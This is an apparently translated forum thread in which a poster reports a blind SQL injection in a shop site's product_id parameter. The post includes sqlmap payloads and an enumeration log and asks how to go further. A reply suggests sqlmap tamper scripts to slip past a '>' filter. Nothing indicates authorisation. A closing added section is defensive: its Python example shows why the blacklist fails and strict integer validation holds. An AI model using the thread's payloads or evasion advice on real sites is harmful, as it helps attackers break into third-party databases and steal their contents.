
18.07.2018, 17:34
Originally posted by mardoksp
Vulnerability found
Code:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]
When I try to get the list of databases, it throws an error
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names
[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to 'http://site/index.php?route=product/...1&product_id=1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48
[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database
[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64
[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32
[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
How do I take this further? Thanks
Code:
--tamper=greatest or --tamper=between or --tamper=least
Try one of these. Judging by the logs, the problem is the > character, and possibly also [B]
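Seen from the defending side, the log in this thread shows why reacting to a single character such as `>` does not fix the injection, while a type check on `product_id` does. The following is an added example, not part of the original thread: it runs the thread's own payloads through a hypothetical `>` blacklist and through strict integer validation. The function names, the blacklist and the 10-digit limit are assumptions.

```python
import re
from urllib.parse import parse_qs

# Query strings constructed from the payloads quoted in the thread.
SAMPLES = [
    "route=product/product&path=1&product_id=1",
    "route=product/product&path=1&product_id=1 AND 7670=7670",
    "route=product/product&path=1&product_id=1 AND ORD(MID((DATABASE()),1,1))>64",
]

# Assumption: product ids are short unsigned decimal integers.
INT_RE = re.compile(r"[0-9]{1,10}")


def char_filter_allows(value):
    """Hypothetical blacklist that reacts only to '>' (the reply's reading of the log)."""
    return ">" not in value


def strict_int(value):
    """Allow-list check: the whole value must be a plain decimal integer."""
    return int(value) if INT_RE.fullmatch(value) else None


def classify(query_string, param="product_id"):
    """Return (raw value, passes '>' blacklist, validated int or None)."""
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    if len(values) != 1:  # missing or duplicated parameter: reject outright
        return (None, False, None)
    value = values[0]
    return (value, char_filter_allows(value), strict_int(value))


def report(samples=SAMPLES):
    """Classify every sample request."""
    return [classify(qs) for qs in samples]


if __name__ == "__main__":
    for value, filter_ok, validated in report():
        print(f"{value!r:50} "
              f"blacklist={'pass' if filter_ok else 'block'} "
              f"strict-int={'accept' if validated is not None else 'reject'}")
```

The boolean payload that confirmed the injection contains no `>` and passes the blacklist, but it is rejected by the integer check; the validated integer is what should reach a parameterized query.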